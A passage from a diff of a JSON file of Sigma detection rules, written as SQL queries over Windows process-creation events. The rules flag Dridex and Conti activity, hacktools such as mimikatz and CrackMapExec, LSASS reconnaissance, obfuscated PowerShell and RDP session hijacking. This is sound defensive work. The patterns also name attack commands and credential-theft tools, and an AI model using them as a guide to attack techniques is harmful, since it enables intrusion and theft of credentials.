((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "attack.t1562.001" ], - "filename": "proc_creation_win_malware_dridex.yml" - }, - { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", - "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE 
'\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE 
'%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. 
Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use by administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process 
(MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' 
ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", - "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "status": "experimental", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - 
"title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE 
'%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. 
NATBypass)", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.discovery" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' 
ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", - "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "test", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative tasks" + 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR 
CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% 
/nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", + "title": "Potential MSTSC Shadowing Activity", + "id": 
"6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "description": "Detects RDP session hijacking by using MSTSC shadowing", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574", - "attack.execution" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur 